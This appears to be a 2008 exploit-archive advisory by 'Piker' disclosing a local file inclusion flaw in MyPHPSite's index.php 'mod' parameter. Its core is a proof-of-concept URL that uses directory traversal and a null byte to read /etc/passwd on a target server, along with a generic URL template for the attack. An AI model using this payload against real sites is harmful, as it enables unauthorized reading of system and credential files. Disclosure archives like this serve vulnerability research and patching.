[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MyPHPsite (index.php mod) Local File Inclusion Vulnerability
# Published : 2008-12-18
# Author : Piker
# Previous Title : Gobbl CMS 1.0 Insecure Cookie Handling Vulnerability
# Next Title : RSMScript 1.21 XSS/Insecure Cookie Handling Vulnerabilities


################## Piker #######################################
#
#
#    MyPHPSite Local File Inclusion Vulnerability
#
#
#    Affected software: MyPHPSite
#    Vendor: www.myphpsite.org
#    Risk: Medium
#
################################################################
#
#    http://[target]/[path]/index.php?mod=[LFI]%00
#
#   PoC: http://[target]/[path]/index.php?mod=../../../../../../etc/passwd%00
#
################################################################
#
#         Found by Piker [piker0x90(at)gmail(dot)com]
#            D.O.M Labs - Security Researchers
#           www.domlabs.org
#
#
################################################################

# www.Syue.com [2008-12-18]